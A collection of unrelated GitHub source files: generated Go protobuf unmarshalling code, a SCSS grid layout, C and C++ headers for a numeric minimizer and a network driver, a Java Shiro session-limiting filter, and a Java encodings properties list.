return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
msglen |= (int(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
if msglen < 0 {
return ErrInvalidLengthMap
}
postIndex := iNdEx + msglen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.Entries = append(m.Entries, &FakeMapEntry{})
if err := m.Entries[len(m.Entries)-1].Unmarshal(dAtA[iNdEx:postIndex]); err != nil {
return err
}
iNdEx = postIndex
default:
iNdEx = preIndex
skippy, err := skipMap(dAtA[iNdEx:])
if err != nil {
return err
}
if skippy < 0 {
return ErrInvalidLengthMap
}
if (iNdEx + skippy) > l {
return io.ErrUnexpectedEOF
}
iNdEx += skippy
}
}
if iNdEx > l {
return io.ErrUnexpectedEOF
}
return nil
}
func (m *FakeMapEntry) Unmarshal(dAtA []byte) error {
l := len(dAtA)
iNdEx := 0
for iNdEx < l {
preIndex := iNdEx
var wire uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowMap
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
wire |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
fieldNum := int32(wire >> 3)
wireType := int(wire & 0x7)
if wireType == 4 {
return fmt.Errorf("proto: FakeMapEntry: wiretype end group for non-group")
}
if fieldNum <= 0 {
return fmt.Errorf("proto: FakeMapEntry: illegal tag %d (wire type %d)", fieldNum, wire)
}
switch fieldNum {
case 1:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field Key", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowMap
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthMap
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.Key = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
case 2:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field Value", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowMap
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthMap
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.Value = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
case 3:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field Other", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowMap
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthMap
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.Other = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
default:
iNdEx = preIndex
skippy, err := skipMap(dAtA[iNdEx:])
if err != nil {
return err
}
if skippy < 0 {
return ErrInvalidLengthMap
}
if (iNdEx + skippy) > l {
return io.ErrUnexpectedEOF
}
iNdEx += skippy
}
}
if iNdEx > l {
return io.ErrUnexpectedEOF
}
return nil
}
func skipMap(dAtA []byte) (n int, err error) {
l := len(dAtA)
iNdEx := 0
for iNdEx < l {
var wire uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return 0, ErrIntOverflowMap
}
if iNdEx >= l {
return 0, io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
wire |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
wireType := int(wire & 0x7)
switch wireType {
case 0:
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return 0, ErrIntOverflowMap
}
if iNdEx >= l {
return 0, io.ErrUnexpectedEOF
}
iNdEx++
if dAtA[iNdEx-1] < 0x80 {
break
}
}
return iNdEx, nil
case 1:
iNdEx += 8
return iNdEx, nil
case 2:
var length int
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return 0, ErrIntOverflowMap
}
if iNdEx >= l {
return 0, io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
length |= (int(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
iNdEx += length
if length < 0 {
return 0, ErrInvalidLengthMap
}
return iNdEx, nil
case 3:
for {
var innerWire uint64
var start int = iNdEx
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return 0, ErrIntOverflowMap
}
if iNdEx >= l {
return 0, io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
innerWire |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
innerWireType := int(innerWire & 0x7)
if innerWireType == 4 {
break
}
next, err := skipMap(dAtA[start:])
if err != nil {
return 0, err
}
iNdEx = start + next
}
return iNdEx, nil
case 4:
return iNdEx, nil
case 5:
iNdEx += 4
return iNdEx, nil
default:
return 0, fmt.Errorf("proto: illegal wireType %d", wireType)
}
}
panic("unreachable")
}
var (
ErrInvalidLengthMap = fmt.Errorf("proto: negative length found during unmarshaling")
ErrIntOverflowMap = fmt.Errorf("proto: integer overflow")
)
func init() { proto.RegisterFile("combos/both/map.proto", fileDescriptorMap) }
var fileDescriptorMap = []byte{
// 310 bytes of a gzipped FileDescriptorProto
0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0x8c, 0x90, 0xbf, 0x4f, 0xc2, 0x40,
0x14, 0xc7, 0xfb, 0x20, 0xd2, 0x78, 0x38, 0x98, 0x46, 0x93, 0xca, 0xf0, 0x42, 0x98, 0x58, 0x6c,
0x13, 0x59, 0xc4, 0xc1, 0xc1, 0xa8, 0x93, 0x2c, 0xe0, 0x6e, 0xae, 0x78, 0xfc, 0x08, 0x94, 0x6b,
0xee, 0x5e, 0x4d, 0x98, 0xe4, 0xcf, 0x71, 0x74, 0xf4, 0x4f, 0x60, 0x64, 0x74, 0xa4, 0xe7, 0xe2,
0xc8, 0xc8, 0x68, 0xb8, 0x62, 0x52, 0x37, 0xb7, 0xf7, 0xf9, 0xde, 0xe7, 0xee, 0x7d, 0x73, 0xec,
0xb4, 0x2f, 0xe3, 0x48, 0xea, 0x30, 0x92, 0x34, 0x0a, 0x63, 0x9e, 0x04, 0x89, 0x92, 0x24, 0xbd,
0x6a, 0xcc, 0x93, 0x67, 0x31, 0xe0, 0xe9, 0x94, 0x74, 0xed, 0x7c, 0x38, 0xa6, 0x51, 0x1a, 0x05,
0x7d, 0x19, 0x87, 0x43, 0x39, 0x94, 0xa1, 0x75, 0xa2, 0x74, 0x60, 0xc9, 0x82, 0x9d, 0xf2, 0xbb,
0x8d, 0x57, 0xe6, 0x76, 0x78, 0xf2, 0x28, 0x34, 0x79, 0x6d, 0xe6, 0x6a, 0x52, 0x4f, 0x9a, 0x94,
0x0f, 0xf5, 0x72, 0xb3, 0x7a, 0x51, 0x0f, 0x0a, 0x0f, 0x07, 0x7b, 0x2d, 0xe8, 0x91, 0xea, 0x91,
0xba, 0x9b, 0x91, 0x9a, 0x77, 0x2b, 0xda, 0x42, 0xad, 0xcd, 0xaa, 0x85, 0xd8, 0x3b, 0x66, 0xe5,
0x89, 0x98, 0xfb, 0x50, 0x87, 0xe6, 0x61, 0x77, 0x37, 0x7a, 0x27, 0xec, 0xe0, 0x85, 0x4f, 0x53,
0xe1, 0x97, 0x6c, 0x96, 0xc3, 0x55, 0xe9, 0x12, 0x1a, 0xd7, 0xcc, 0xbd, 0xe7, 0x13, 0xd1, 0xe1,
0x89, 0xd7, 0x62, 0xae, 0x98, 0x91, 0x1a, 0x0b, 0xbd, 0x2f, 0x70, 0xf6, 0xa7, 0xc0, 0x5e, 0xcb,
0x37, 0xff, 0x9a, 0x8d, 0x07, 0x76, 0x54, 0x3c, 0xf8, 0xef, 0xee, 0x5d, 0x2a, 0x69, 0x24, 0x94,
0x5f, 0xce, 0x53, 0x0b, 0x37, 0xb7, 0xcb, 0x0c, 0x9d, 0x55, 0x86, 0xce, 0x67, 0x86, 0xce, 0x3a,
0x43, 0xd8, 0x64, 0x08, 0xdb, 0x0c, 0x61, 0x61, 0x10, 0xde, 0x0c, 0xc2, 0xbb, 0x41, 0xf8, 0x30,
0x08, 0x4b, 0x83, 0xb0, 0x32, 0x08, 0x6b, 0x83, 0xf0, 0x6d, 0xd0, 0xd9, 0x18, 0x84, 0xad, 0x41,
0x67, 0xf1, 0x85, 0x4e, 0x54, 0xb1, 0x7f, 0xdb, 0xfa, 0x09, 0x00, 0x00, 0xff, 0xff, 0x11, 0xc9,
0x76, 0xfa, 0xb0, 0x01, 0x00, 0x00,
}
| {
"pile_set_name": "Github"
} |
// Variables
$size4-columns: 4 !default;
$size8-columns: 8 !default;
$size12-columns: 12 !default;
$size4-margin: 8px !default;
$size8-margin: 8px !default;
$size12-margin: 12px !default;
$size4-maxwidth: unset !default;
$size8-maxwidth: unset !default;
$size12-maxwidth: 1304px !default;
$size4-up-breakpoint: 599.99px !default;
$size8-up-breakpoint: 839.99px !default;
$size8-and-up: 'only screen and (min-width : #{$size4-up-breakpoint})' !default;
$size12-and-up: 'only screen and (min-width : #{$size8-up-breakpoint})' !default;
// TEMPORALLY ALL HAVE THE SAME GUTTER
$gutter-width: 12px !default;
// GRID
.container {
margin: 0 auto;
max-width: $size4-maxwidth;
padding: 0 $size4-margin;
box-sizing: border-box;
}
@media #{$size8-and-up} {
.container {
max-width: $size8-maxwidth;
padding: 0 $size8-margin;
}
}
@media #{$size12-and-up} {
.container {
max-width: $size12-maxwidth;
padding: 0 $size12-margin;
}
}
.col .row {
// margin-left: (-1 * $gutter-width / 2);
// margin-right: (-1 * $gutter-width / 2);
}
.section {
padding-top: 1rem;
padding-bottom: 1rem;
&.no-pad {
padding: 0;
}
&.no-pad-bot {
padding-bottom: 0;
}
&.no-pad-top {
padding-top: 0;
}
}
// Mixins to eliminate code repitition
@mixin reset-offset {
left: auto;
right: auto;
}
@mixin grid-classes($size, $i, $perc) {
&.offset-#{$size}#{$i} {
margin-left: $perc;
}
&.pull-#{$size}#{$i} {
right: $perc;
}
&.push-#{$size}#{$i} {
left: $perc;
}
[dir='rtl'] & {
&.offset-#{$size}#{$i} {
margin-right: $perc;
margin-left: auto;
}
&.pull-#{$size}#{$i} {
right: auto;
left: $perc;
}
&.push-#{$size}#{$i} {
left: auto;
right: $perc;
}
}
}
.row {
display: flex;
flex-wrap: wrap;
margin-left: auto;
margin-right: auto;
width: 100%;
// Clear floating children
&:after {
// content: '';
// display: table;
// clear: both;
}
.col {
display: flex;
flex-wrap: wrap;
float: left;
box-sizing: border-box;
padding: 0 $gutter-width / 2;
min-height: 1px;
&[class*='push-'],
&[class*='pull-'] {
position: relative;
}
$i: 1;
@while $i <= $size4-columns {
$perc: unquote((100 / ($size4-columns / $i)) + '%');
&.s#{$i} {
width: $perc;
@include reset-offset;
}
$i: $i + 1;
}
$i: 1;
@while $i <= $size4-columns {
$perc: unquote((100 / ($size4-columns / $i)) + '%');
@include grid-classes('s', $i, $perc);
$i: $i + 1;
}
.s-auto {
width: auto;
}
@media #{$size8-and-up} {
$i: 1;
@while $i <= $size8-columns {
$perc: unquote((100 / ($size8-columns / $i)) + '%');
&.m#{$i} {
width: $perc;
@include reset-offset;
}
$i: $i + 1;
}
$i: 1;
@while $i <= $size8-columns {
$perc: unquote((100 / ($size8-columns / $i)) + '%');
@include grid-classes('m', $i, $perc);
$i: $i + 1;
}
.m-auto {
width: auto;
}
}
@media #{$size12-and-up} {
$i: 1;
@while $i <= $size12-columns {
$perc: unquote((100 / ($size12-columns / $i)) + '%');
&.l#{$i} {
width: $perc;
@include reset-offset;
}
$i: $i + 1;
}
$i: 1;
@while $i <= $size12-columns {
$perc: unquote((100 / ($size12-columns / $i)) + '%');
@include grid-classes('l', $i, $perc);
$i: $i + 1;
}
.l-auto {
width: auto;
}
}
}
// This properties might be moved to work depending on the size
.col.no-gutters {
padding: 0;
}
.col.middle {
align-items: center;
}
.col.baseline {
align-items: baseline;
}
.col.horizontal-center {
justify-content: center;
}
.col.space-around {
justify-content: space-around;
}
}
.row.horizontal-center {
justify-content: center;
}
.row.baseline {
align-items: baseline;
}
.row.end {
align-items: flex-end;
}
.row.middle {
align-items: center;
}
.row.space-between {
justify-content: space-between;
}
.row.space-around {
justify-content: space-around;
}
.row.space-between {
justify-content: space-between;
}
.row.space-evenly {
justify-content: space-evenly;
}
.row.h-end {
justify-content: flex-end;
}
.row.h-baseline {
justify-content: baseline;
}
.no-wrap {
flex-wrap: nowrap;
}
| {
"pile_set_name": "Github"
} |
// This is core/vnl/algo/vnl_brent.h
#ifndef vnl_brent_h_
#define vnl_brent_h_
//:
// \file
// \author [email protected]
// \date 07 Dec 00
//
// \verbatim
// Modifications
// 31 May 2001 Ian Scott (Manchester). Added some documentation
// 31 May 2001 Ian Scott (Manchester). Added minimize_given_bounds_and_1st_f
// \endverbatim
#include <vnl/vnl_cost_function.h>
#include <vnl/algo/vnl_brent_minimizer.h>
#include <vnl/algo/vnl_algo_export.h>
//: Brent 1D minimizer (deprecated)
//
// Please use vnl_brent_minimizer instead.
//
// This routine used to contain copyrighted code, and is deprecated.
// It is now simply a wrapper around vnl_brent_minimizer.
class VNL_ALGO_EXPORT vnl_brent : public vnl_brent_minimizer
{
public:
vnl_brent(vnl_cost_function* functor);
~vnl_brent() override;
//: Find a minimum of f(x) near to ax.
double minimize(double ax);
//: Find the minimum value of f(x) within a<= x <= c.
// The minimum value is the return value, and *xmin the relevant value of x.
// You need to provide a bracket for the minimum
// Also returns fa = f(a), etc.
double minimize_given_bounds(double ax, double bx, double cx,
double tol,
double *xmin);
//: Save time over minimize_given_bounds() if you know f(b)
// This function avoids a single computation of f, if you already know
// it.
double minimize_given_bounds_and_1st_f(double ax, double bx, double fb,
double cx, double tol, double *xmin);
//: Given distinct points ax, and bx, find a bracket for the minimum.
// Return a bracket ax > bx > cx, f(b) < f(a), f(b) < f(c) for minimum.
// Also returns fa = f(a), etc.
//
// You should probably use vnl_bracket_minimum instead of this function.
void bracket_minimum(double *ax, double *bx, double *cx,
double *fa, double *fb, double *fc);
//: Given distinct points ax, and bx, find a bracket for the minimum.
// Return a bracket ax > bx > cx, f(b) < f(a), f(b) < f(c) for minimum.
//
// You should probably use vnl_bracket_minimum instead of this function.
void bracket_minimum(double *ax, double *bx, double *cx);
};
#endif // vnl_brent_h_
| {
"pile_set_name": "Github"
} |
package com.dashuai.learning.shiro.filter;
import com.dashuai.learning.shiro.model.UserInfo;
import com.dashuai.learning.utils.json.JSONParseUtils;
import org.apache.shiro.cache.Cache;
import org.apache.shiro.cache.CacheManager;
import org.apache.shiro.session.Session;
import org.apache.shiro.session.mgt.DefaultSessionKey;
import org.apache.shiro.session.mgt.SessionManager;
import org.apache.shiro.subject.Subject;
import org.apache.shiro.web.filter.AccessControlFilter;
import org.apache.shiro.web.util.WebUtils;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import java.io.PrintWriter;
import java.io.Serializable;
import java.util.Deque;
import java.util.HashMap;
import java.util.LinkedList;
import java.util.Map;
/**
* 思路:
* 1.读取当前登录用户名,获取在缓存中的sessionId队列
* 2.判断队列的长度,大于最大登录限制的时候,按踢出规则
* 将之前的sessionId中的session域中存入kickout:true,并更新队列缓存
* 3.判断当前登录的session域中的kickout如果为true,
* 想将其做退出登录处理,然后再重定向到踢出登录提示页面
*
* @author Liaozihong
*/
public class KickoutSessionControlFilter extends AccessControlFilter {
/**
* 踢出后到的地址
*/
private String kickoutUrl;
/**
* 踢出之前登录的/之后登录的用户 默认踢出之前登录的用户
*/
private boolean kickoutAfter = false;
/**
* 运行同一账号同时登录数
*/
private int maxSession = 1;
private SessionManager sessionManager;
private Cache<String, Deque<Serializable>> cache;
/**
* Sets kickout url.
*
* @param kickoutUrl the kickout url
*/
public void setKickoutUrl(String kickoutUrl) {
this.kickoutUrl = kickoutUrl;
}
/**
* Sets kickout after.
*
* @param kickoutAfter the kickout after
*/
public void setKickoutAfter(boolean kickoutAfter) {
this.kickoutAfter = kickoutAfter;
}
/**
* Sets max session.
*
* @param maxSession the max session
*/
public void setMaxSession(int maxSession) {
this.maxSession = maxSession;
}
/**
* Sets session manager.
*
* @param sessionManager the session manager
*/
public void setSessionManager(SessionManager sessionManager) {
this.sessionManager = sessionManager;
}
/**
* Sets cache manager.
* 设置Cache的key的前缀
*
* @param cacheManager the cache manager
*/
public void setCacheManager(CacheManager cacheManager) {
this.cache = cacheManager.getCache("shiro_redis_cache");
}
@Override
protected boolean isAccessAllowed(ServletRequest request, ServletResponse response, Object mappedValue) {
return false;
}
@Override
protected boolean onAccessDenied(ServletRequest request, ServletResponse response) throws Exception {
Subject subject = getSubject(request, response);
if (!subject.isAuthenticated() && !subject.isRemembered()) {
//如果没有登录,直接进行之后的流程
return true;
}
Session session = subject.getSession();
UserInfo user = (UserInfo) subject.getPrincipal();
String username = user.getUsername();
Serializable sessionId = session.getId();
//读取redis缓存
Deque<Serializable> deque = cache.get(username);
//如果没有改集合队列,则创建
if (deque == null) {
deque = new LinkedList<>();
//将sessionId存入队列
deque.push(sessionId);
//将用户的sessionId队列缓存进redis,以username为key标识
cache.put(username, deque);
}
//设置用户默认没被踢
session.setAttribute("kickout", true);
//如果队列里没有此sessionId,且用户没有被踢出;放入队列
if (!deque.contains(sessionId)) {
deque.push(sessionId);
cache.put(username, deque);
}
//如果队列里的sessionId数超出最大会话数,开始踢人
while (deque.size() > maxSession) {
Serializable kickoutSessionId = null;
//如果踢出后者
if (kickoutAfter) {
kickoutSessionId = deque.removeFirst();
} else { //否则踢出前者
kickoutSessionId = deque.removeLast();
}
//踢出后再更新下缓存队列
cache.put(username, deque);
try {
//获取被踢出的sessionId的session对象
Session kickoutSession = sessionManager.getSession(new DefaultSessionKey(kickoutSessionId));
if (kickoutSession != null) {
//设置会话的kickout属性表示踢出了
session.setAttribute("kickout", false);
}
} catch (Exception e) {//ignore exception
}
}
//如果被踢出了,直接退出,重定向到踢出后的地址
if (!((Boolean) session.getAttribute("kickout"))) {
try {
//退出登录
subject.logout();
} catch (Exception e) { //ignore
}
// saveRequest(request);
//判断是不是Ajax请求
if ("XMLHttpRequest".equalsIgnoreCase(((HttpServletRequest) request).getHeader("X-Requested-With"))) {
Map<String, String> resultMap = new HashMap<>();
resultMap.put("user_status", "300");
resultMap.put("message", "您已经在其他地方登录,请重新登录!");
//输出json串
response.setContentType("application/json;charset=UTF-8");
PrintWriter out = response.getWriter();
out.println(JSONParseUtils.object2JsonString(resultMap));
out.flush();
out.close();
return false;
} else {
//重定向
WebUtils.issueRedirect(request, response, kickoutUrl);
return false;
}
}
return true;
}
} | {
"pile_set_name": "Github"
} |
/* SPDX-License-Identifier: BSD-3-Clause
*
* Copyright (c) 2016-2018 Solarflare Communications Inc.
* All rights reserved.
*
* This software was jointly developed between OKTET Labs (under contract
* for Solarflare) and Solarflare Communications, Inc.
*/
#ifndef _SFC_EV_H_
#define _SFC_EV_H_
#include <rte_ethdev_driver.h>
#include "efx.h"
#include "sfc.h"
#ifdef __cplusplus
extern "C" {
#endif
struct sfc_adapter;
struct sfc_dp_rxq;
struct sfc_dp_txq;
enum sfc_evq_state {
SFC_EVQ_UNINITIALIZED = 0,
SFC_EVQ_INITIALIZED,
SFC_EVQ_STARTING,
SFC_EVQ_STARTED,
SFC_EVQ_NSTATES
};
enum sfc_evq_type {
SFC_EVQ_TYPE_MGMT = 0,
SFC_EVQ_TYPE_RX,
SFC_EVQ_TYPE_TX,
SFC_EVQ_NTYPES
};
struct sfc_evq {
/* Used on datapath */
efx_evq_t *common;
const efx_ev_callbacks_t *callbacks;
unsigned int read_ptr;
unsigned int read_ptr_primed;
boolean_t exception;
efsys_mem_t mem;
struct sfc_dp_rxq *dp_rxq;
struct sfc_dp_txq *dp_txq;
/* Not used on datapath */
struct sfc_adapter *sa;
unsigned int evq_index;
enum sfc_evq_state init_state;
enum sfc_evq_type type;
unsigned int entries;
};
/*
* Functions below define event queue to transmit/receive queue and vice
* versa mapping.
* Own event queue is allocated for management, each Rx and each Tx queue.
* Zero event queue is used for management events.
* Rx event queues from 1 to RxQ number follow management event queue.
* Tx event queues follow Rx event queues.
*/
static inline unsigned int
sfc_evq_index_by_rxq_sw_index(__rte_unused struct sfc_adapter *sa,
unsigned int rxq_sw_index)
{
return 1 + rxq_sw_index;
}
static inline unsigned int
sfc_evq_index_by_txq_sw_index(struct sfc_adapter *sa, unsigned int txq_sw_index)
{
return 1 + sa->eth_dev->data->nb_rx_queues + txq_sw_index;
}
int sfc_ev_attach(struct sfc_adapter *sa);
void sfc_ev_detach(struct sfc_adapter *sa);
int sfc_ev_start(struct sfc_adapter *sa);
void sfc_ev_stop(struct sfc_adapter *sa);
int sfc_ev_qinit(struct sfc_adapter *sa,
enum sfc_evq_type type, unsigned int type_index,
unsigned int entries, int socket_id, struct sfc_evq **evqp);
void sfc_ev_qfini(struct sfc_evq *evq);
int sfc_ev_qstart(struct sfc_evq *evq, unsigned int hw_index);
void sfc_ev_qstop(struct sfc_evq *evq);
int sfc_ev_qprime(struct sfc_evq *evq);
void sfc_ev_qpoll(struct sfc_evq *evq);
void sfc_ev_mgmt_qpoll(struct sfc_adapter *sa);
#ifdef __cplusplus
}
#endif
#endif /* _SFC_EV_H_ */
| {
"pile_set_name": "Github"
} |
package com.coderings.dp.composite;
public class Line implements Shape {
@Override
public void draw() {
System.out.println("draw line");
}
}
| {
"pile_set_name": "Github"
} |
#
# Basic Encodings, available in all JDKs
#
# American Standard Code for Information Interchange
#
ASCII=true
# Windows Latin-1
#
Cp1252=true
#
# Latin alphabet No. 1
ISO-8859-1=true
#
# Latin alphabet No. 9, 'Euro' enabled
ISO-8859-15=true
#
# 8 Bit UCS Transformation Format
UTF-8=true
#
# 16 Bit UCS Transformation Format
UTF-16=true
#
# missing: UTF-16BE, UTF-16LE are no base need in EndUser environments
UTF-16BE=false
UTF-16LE=false
#
# extended encoding set, contained in lib/charsets.jar
# (International JDK only)
#
#Windows Eastern Europe
Cp1250=true
#Windows Russian (Cyrillic)
Cp1251=true
#Windows Greek
Cp1253=true
#Windows Turkish
Cp1254=true
#Windows Hebrew
Cp1255=true
#Windows Arabic
Cp1256=true
#Windows Baltic
Cp1257=true
#Windows Vietnamese
Cp1258=true
# Latin alphabet No. 2
ISO-8859-2=true
#Latin alphabet No. 3
ISO-8859-3=true
#Latin alphabet No. 4
ISO-8859-4=true
#Latin/Cyrillic Alphabet
ISO-8859-5=true
#Latin/Arabic Alphabet
ISO-8859-6=true
#Latin/Greek Alphabet
ISO-8859-7=true
#Latin/Hebrew Alphabet
ISO-8859-8=true
#Latin alphabet No. 5
ISO-8859-9=true
#Latin alphabet No. 7
ISO-8859-13=true
#Windows Japanese
MS932=true
# JISX 0201, 0208 and 0212, EUC encoding Japanese
EUC-JP=true
# JISX 0201, 0208, EUC encoding Japanese
EUC-JP-LINUX=true
# Shift-JIS, Japanese
SJIS=true
# JIS X 0201, 0208, in ISO 2002 form, Japanese
ISO-2022-JP=true
# Windows Simplified Chinese
MS936=true
# Simplified Chinese, PRC standard
GB18030=true
# GB2312, EUC encoding, Simplified Chinese
EUC_CN=true
# GB2312, EUC encoding, Simplified Chinese
GB2312=true
# GBK, Simplified Chinese
GBK=true
# ISCII encoding of Indic scripts
ISCII91=true
# GB2312 in ISO 2022 CN form, Simplified Chinese
ISO-2022-CN-GB=true
# Windows Korean
MS949=true
# KS C 5601, EUC encoding, Korean
EUC_KR=true
# ISO 2022 KR, Korean
ISO-2022-KR=true
# Windows Traditional Chinese
MS950=true
# CNS 11643 (Plane 1-3), EUC encoding, Traditional Chinese
EUC-TW=true
# CNS 11643 in ISO 2022 CN form, Traditional Chinese
ISO-2022-CN-CNS=true
# Big5, Traditional Chinese
Big5=true
# Big5 with Hong Kong extensions, Traditional Chinese
Big5-HKSCS=true
# TIS 620, Thai
TIS-620=true
# KOI8-R, Russian
KOI8-R=true
#
# extended encoding set, contained in lib/charsets.jar
#
# Big5 with seven additional Hanzi ideograph character mappings
Big5_Solaris=true
# USA, Canada (Bilingual, French), Netherlands, Portugal, Brazil, Australia
Cp037=true
# IBM Austria, Germany
Cp273=true
# IBM Denmark, Norway
Cp277=true
# IBM Finland, Sweden
Cp278=true
# IBM Italy
Cp280=true
# IBM Catalan/Spain, Spanish Latin America
Cp284=true
# IBM United Kingdom, Ireland
Cp285=true
# IBM France
Cp297=true
# IBM Arabic
Cp420=true
# IBM Hebrew
Cp424=true
# MS-DOS United States, Australia, New Zealand, South Africa
Cp437=true
# EBCDIC 500V1
Cp500=true
# PC Greek
Cp737=true
# PC Baltik
Cp775=true
# IBM Thailand extended SBCS
Cp838=true
# MS-DOS Latin-1
Cp850=true
# MS-DOS Latin 2
Cp852=true
# IBM Cyrillic
Cp855=true
# IBM Hebrew
Cp856=true
# IBM Turkish
Cp857=true
# MS-DOS Latin-1 with Euro character
Cp858=true
# MS-DOS Portuguese
Cp860=true
# MS-DOS Icelandic
Cp861=true
# PC Hebrew
Cp862=true
# MS-DOS Canadian French
Cp863=true
# PC Arabic
Cp864=true
# MS-DOS Nordic
Cp865=true
# MS-DOS Russian
Cp866=true
# MS-DOS Pakistan
Cp868=true
# IBM Modern Greek
Cp869=true
# IBM Multilingual Latin-2
Cp870=true
# IBM Iceland
Cp871=true
# IBM Thai
Cp874=true
# IBM Greek
Cp875=true
# IBM Pakistan (Urdu)
Cp918=true
# IBM Lativa, Lithuania (AIX, DOS)
Cp921=true
# IBM Estonia (AIX, DOS)
Cp922=true
# Japanese Katakana-Kanji mixed with 4370 UDC, superset of 5026
Cp930=true
# Korean mixed with 1880 UDC, superset of 5029
Cp933=true
# Simplified Chinese mixed with 1880 UDC, superset of 5031
Cp935=true
# Traditional Chinsese Hostmixed with 6204 UDC, superset of 5033
Cp937=true
# Japanese Latin Kanji mixed with 4370 UDC, superset of 5035
Cp939=true
# IBM OS/2 Japanese, superset of Cp932
Cp942=true
# Variant of Cp942: IBM OS/2 Japanese, superset of Cp932
Cp942C=true
# IBM OS/2 Japanese, superset of Cp932 and Shift-JIS
Cp943=true
# Variant of Cp943: IBM OS/2 Japanese, superset of Cp932 and Shift-JIS
Cp943C=true
# IBM OS/2 Chinese (Taiwan) superset of Cp938
Cp948=true
# PC Korean
Cp949=true
# Variant of Cp949: PC Korean
Cp949C=true
# PC Chinese (Hong Kong, Taiwan)
Cp950=true
# AIX Chinese (Taiwan)
Cp964=true
# AIX Korean
Cp970=true
# IBM AIX Parkistan (Urdu)
Cp1006=true
# IBM Multilingual Cyrillic: Bulgaria, Bosnia, Herzegovinia, Macedonia (FYR)
Cp1025=true
# IBM Latin-5, Turkey
Cp1026=true
# IBM Arabic Windows
Cp1046=true
# IBM Iran (Farsi)/Persian
Cp1097=true
# IBM Iran (Farsi)/Persian (PC)
Cp1098=true
# IBM Lativa, Lithuania
Cp1112=true
# IBM Estonia
Cp1122=true
# IBM Ukraine
Cp1123=true
# IBM AIX Ukraine
Cp1124=true
# USA, Canada (Bilingual, French), Netherlands, Portugal, Brazil, Australia (with Euro)
Cp1140=true
# IBM Austria, Germany (Euro enabled)
Cp1141=true
# IBM Denmark, Norway (Euro enabled)
Cp1142=true
# IBM Finland, Sweden (Euro enabled)
Cp1143=true
# IBM Italy (Euro enabled)
Cp1144=true
# IBM Catalan/Spain, Spanish Latin America (with Euro)
Cp1145=true
# IBM United Kingdom, Ireland (with Euro)
Cp1146=true
# IBM France (with Euro)
Cp1147=true
# IBM EBCDIC 500V1 (with Euro)
Cp1148=true
# IBM Iceland (with Euro)
Cp1149=true
# IBM OS/2, DOS People's Republic of Chine (PRC)
Cp1381=true
# IBM AIX People's Republic of Chine (PRC)
Cp1383=true
# IBM-eucJP - Japanese (superset of 5050)
Cp33722=true
# Windows Thai
MS874=true
# Macintosh Arabic
MacArabic=true
# Macintosh Latin-2
MacCentralEurope=true
# Macintosh Croatian
MacCroatian=true
# Macintosh Cyrillic
MacCyrillic=true
# Macintosh Dingbat
MacDingbat=true
# Macintosh Greek
MacGreek=true
# Macintosh Hebrew
MacHebrew=true
# Macintosh Iceland
MacIceland=true
# Macintosh Roman
MacRoman=true
# Macintosh Romania
MacRomania=true
# Macintosh Symbol
MacSymbol=true
# Macintosh Thai
MacThai=true
# Macintosh Turkish
MacTurkish=true
# Macintosh Ukraine
MacUkraine=true
| {
"pile_set_name": "Github"
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.